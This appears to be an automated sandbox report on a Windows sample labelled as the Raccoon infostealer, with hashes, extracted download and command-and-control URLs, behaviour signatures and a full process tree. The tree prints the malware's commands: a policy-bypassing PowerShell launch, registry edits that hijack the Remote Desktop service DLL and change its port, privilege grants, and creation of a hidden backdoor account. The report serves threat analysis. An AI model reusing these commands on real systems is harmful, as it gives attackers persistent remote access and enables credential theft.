Analysis
-
max time kernel
60s -
max time network
151s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
04-06-2021 08:04
Static task
static1
Behavioral task
behavioral1
Sample
798f0fce3485b678647690e3fa01b6be.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
798f0fce3485b678647690e3fa01b6be.exe
Resource
win10v20210410
General
-
Target
798f0fce3485b678647690e3fa01b6be.exe
-
Size
567KB
-
MD5
798f0fce3485b678647690e3fa01b6be
-
SHA1
538cba8492b57c83bb21a28dc33cbcfd77058b01
-
SHA256
8fa841c71a956755f6f393ca92a04d0a6950343a7a765a3035f4581dda198488
-
SHA512
6ffaa58a03c159aecd3c86b9f1199a94c8b97dddfdf0eef1aaa528dba78b4ad8c66019bde1b2119e9cef961442e5ef3c2b95cb3b723829ba744de64b18404da9
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
raccoon
89ac909b803bacbc6cc523520599c4b9c029b033
-
url4cnc
https://tttttt.me/jdiamond13
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 20 3532 powershell.exe 22 3532 powershell.exe 23 3532 powershell.exe 24 3532 powershell.exe 26 3532 powershell.exe 28 3532 powershell.exe 30 3532 powershell.exe 32 3532 powershell.exe 34 3532 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
XfkRrAZJGQ.exepid process 2152 XfkRrAZJGQ.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 8 IoCs
Processes:
798f0fce3485b678647690e3fa01b6be.exepid process 2388 798f0fce3485b678647690e3fa01b6be.exe 2388 798f0fce3485b678647690e3fa01b6be.exe 2388 798f0fce3485b678647690e3fa01b6be.exe 2388 798f0fce3485b678647690e3fa01b6be.exe 2388 798f0fce3485b678647690e3fa01b6be.exe 2388 798f0fce3485b678647690e3fa01b6be.exe 1304 1304 -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jgpyxi3k.l5s.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA60A.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA62C.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA61B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA63C.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA5EA.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_brq31ar5.avx.psm1 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1380 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3820 powershell.exe 3820 powershell.exe 3820 powershell.exe 3748 powershell.exe 3748 powershell.exe 3748 powershell.exe 2704 powershell.exe 2704 powershell.exe 2704 powershell.exe 2304 powershell.exe 2304 powershell.exe 2304 powershell.exe 3820 powershell.exe 3820 powershell.exe 3820 powershell.exe 3532 powershell.exe 3532 powershell.exe 3532 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 628 628 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3820 powershell.exe Token: SeDebugPrivilege 3748 powershell.exe Token: SeIncreaseQuotaPrivilege 3748 powershell.exe Token: SeSecurityPrivilege 3748 powershell.exe Token: SeTakeOwnershipPrivilege 3748 powershell.exe Token: SeLoadDriverPrivilege 3748 powershell.exe Token: SeSystemProfilePrivilege 3748 powershell.exe Token: SeSystemtimePrivilege 3748 powershell.exe Token: SeProfSingleProcessPrivilege 3748 powershell.exe Token: SeIncBasePriorityPrivilege 3748 powershell.exe Token: SeCreatePagefilePrivilege 3748 powershell.exe Token: SeBackupPrivilege 3748 powershell.exe Token: SeRestorePrivilege 3748 powershell.exe Token: SeShutdownPrivilege 3748 powershell.exe Token: SeDebugPrivilege 3748 powershell.exe Token: SeSystemEnvironmentPrivilege 3748 powershell.exe Token: SeRemoteShutdownPrivilege 3748 powershell.exe Token: SeUndockPrivilege 3748 powershell.exe Token: SeManageVolumePrivilege 3748 powershell.exe Token: 33 3748 powershell.exe Token: 34 3748 powershell.exe Token: 35 3748 powershell.exe Token: 36 3748 powershell.exe Token: SeDebugPrivilege 2704 powershell.exe Token: SeIncreaseQuotaPrivilege 2704 powershell.exe Token: SeSecurityPrivilege 2704 powershell.exe Token: SeTakeOwnershipPrivilege 2704 powershell.exe Token: SeLoadDriverPrivilege 2704 powershell.exe Token: SeSystemProfilePrivilege 2704 powershell.exe Token: SeSystemtimePrivilege 2704 powershell.exe Token: SeProfSingleProcessPrivilege 2704 powershell.exe Token: SeIncBasePriorityPrivilege 2704 powershell.exe Token: SeCreatePagefilePrivilege 2704 powershell.exe Token: SeBackupPrivilege 2704 powershell.exe Token: SeRestorePrivilege 2704 powershell.exe Token: SeShutdownPrivilege 2704 powershell.exe Token: SeDebugPrivilege 2704 powershell.exe Token: SeSystemEnvironmentPrivilege 2704 powershell.exe Token: SeRemoteShutdownPrivilege 2704 powershell.exe Token: SeUndockPrivilege 2704 powershell.exe Token: SeManageVolumePrivilege 2704 powershell.exe Token: 33 2704 powershell.exe Token: 34 2704 powershell.exe Token: 35 2704 powershell.exe Token: 36 2704 powershell.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeIncreaseQuotaPrivilege 2304 powershell.exe Token: SeSecurityPrivilege 2304 powershell.exe Token: SeTakeOwnershipPrivilege 2304 powershell.exe Token: SeLoadDriverPrivilege 2304 powershell.exe Token: SeSystemProfilePrivilege 2304 powershell.exe Token: SeSystemtimePrivilege 2304 powershell.exe Token: SeProfSingleProcessPrivilege 2304 powershell.exe Token: SeIncBasePriorityPrivilege 2304 powershell.exe Token: SeCreatePagefilePrivilege 2304 powershell.exe Token: SeBackupPrivilege 2304 powershell.exe Token: SeRestorePrivilege 2304 powershell.exe Token: SeShutdownPrivilege 2304 powershell.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeSystemEnvironmentPrivilege 2304 powershell.exe Token: SeRemoteShutdownPrivilege 2304 powershell.exe Token: SeUndockPrivilege 2304 powershell.exe Token: SeManageVolumePrivilege 2304 powershell.exe Token: 33 2304 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
798f0fce3485b678647690e3fa01b6be.execmd.exeXfkRrAZJGQ.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 2388 wrote to memory of 2152 2388 798f0fce3485b678647690e3fa01b6be.exe XfkRrAZJGQ.exe PID 2388 wrote to memory of 2152 2388 798f0fce3485b678647690e3fa01b6be.exe XfkRrAZJGQ.exe PID 2388 wrote to memory of 3952 2388 798f0fce3485b678647690e3fa01b6be.exe cmd.exe PID 2388 wrote to memory of 3952 2388 798f0fce3485b678647690e3fa01b6be.exe cmd.exe PID 2388 wrote to memory of 3952 2388 798f0fce3485b678647690e3fa01b6be.exe cmd.exe PID 3952 wrote to memory of 1380 3952 cmd.exe timeout.exe PID 3952 wrote to memory of 1380 3952 cmd.exe timeout.exe PID 3952 wrote to memory of 1380 3952 cmd.exe timeout.exe PID 2152 wrote to memory of 3820 2152 XfkRrAZJGQ.exe powershell.exe PID 2152 wrote to memory of 3820 2152 XfkRrAZJGQ.exe powershell.exe PID 3820 wrote to memory of 2892 3820 powershell.exe csc.exe PID 3820 wrote to memory of 2892 3820 powershell.exe csc.exe PID 2892 wrote to memory of 3732 2892 csc.exe cvtres.exe PID 2892 wrote to memory of 3732 2892 csc.exe cvtres.exe PID 3820 wrote to memory of 3748 3820 powershell.exe powershell.exe PID 3820 wrote to memory of 3748 3820 powershell.exe powershell.exe PID 3820 wrote to memory of 2704 3820 powershell.exe powershell.exe PID 3820 wrote to memory of 2704 3820 powershell.exe powershell.exe PID 3820 wrote to memory of 2304 3820 powershell.exe powershell.exe PID 3820 wrote to memory of 2304 3820 powershell.exe powershell.exe PID 3820 wrote to memory of 1212 3820 powershell.exe reg.exe PID 3820 wrote to memory of 1212 3820 powershell.exe reg.exe PID 3820 wrote to memory of 1120 3820 powershell.exe reg.exe PID 3820 wrote to memory of 1120 3820 powershell.exe reg.exe PID 3820 wrote to memory of 4088 3820 powershell.exe reg.exe PID 3820 wrote to memory of 4088 3820 powershell.exe reg.exe PID 3820 wrote to memory of 2148 3820 powershell.exe net.exe PID 3820 wrote to memory of 2148 3820 powershell.exe net.exe PID 2148 wrote to memory of 3784 2148 net.exe net1.exe PID 2148 wrote to memory of 3784 2148 net.exe net1.exe PID 3820 wrote to memory of 744 3820 powershell.exe cmd.exe PID 3820 wrote to memory of 744 3820 powershell.exe cmd.exe PID 744 wrote to memory of 1592 744 cmd.exe cmd.exe PID 744 wrote to memory of 1592 744 cmd.exe cmd.exe PID 1592 wrote to memory of 3152 1592 cmd.exe net.exe PID 1592 wrote to memory of 3152 1592 cmd.exe net.exe PID 3152 wrote to memory of 752 3152 net.exe net1.exe PID 3152 wrote to memory of 752 3152 net.exe net1.exe PID 3820 wrote to memory of 3548 3820 powershell.exe cmd.exe PID 3820 wrote to memory of 3548 3820 powershell.exe cmd.exe PID 3548 wrote to memory of 1492 3548 cmd.exe cmd.exe PID 3548 wrote to memory of 1492 3548 cmd.exe cmd.exe PID 1492 wrote to memory of 2284 1492 cmd.exe net.exe PID 1492 wrote to memory of 2284 1492 cmd.exe net.exe PID 2284 wrote to memory of 2396 2284 net.exe net1.exe PID 2284 wrote to memory of 2396 2284 net.exe net1.exe PID 2616 wrote to memory of 2728 2616 cmd.exe net.exe PID 2616 wrote to memory of 2728 2616 cmd.exe net.exe PID 2728 wrote to memory of 796 2728 net.exe net1.exe PID 2728 wrote to memory of 796 2728 net.exe net1.exe PID 3948 wrote to memory of 2148 3948 cmd.exe net.exe PID 3948 wrote to memory of 2148 3948 cmd.exe net.exe PID 2148 wrote to memory of 2752 2148 net.exe net1.exe PID 2148 wrote to memory of 2752 2148 net.exe net1.exe PID 3288 wrote to memory of 744 3288 cmd.exe net.exe PID 3288 wrote to memory of 744 3288 cmd.exe net.exe PID 744 wrote to memory of 3784 744 net.exe net1.exe PID 744 wrote to memory of 3784 744 net.exe net1.exe PID 3212 wrote to memory of 1772 3212 cmd.exe net.exe PID 3212 wrote to memory of 1772 3212 cmd.exe net.exe PID 1772 wrote to memory of 3532 1772 net.exe net1.exe PID 1772 wrote to memory of 3532 1772 net.exe net1.exe PID 1380 wrote to memory of 3764 1380 cmd.exe net.exe PID 1380 wrote to memory of 3764 1380 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\798f0fce3485b678647690e3fa01b6be.exe"C:\Users\Admin\AppData\Local\Temp\798f0fce3485b678647690e3fa01b6be.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\XfkRrAZJGQ.exe"C:\Users\Admin\AppData\Local\Temp\XfkRrAZJGQ.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jacslsk4\jacslsk4.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B81.tmp" "c:\Users\Admin\AppData\Local\Temp\jacslsk4\CSC78E3A215782F48DD9CB5172249BAE1F.TMP"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\798f0fce3485b678647690e3fa01b6be.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc b1mq90yo /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc b1mq90yo /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc b1mq90yo /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵
-
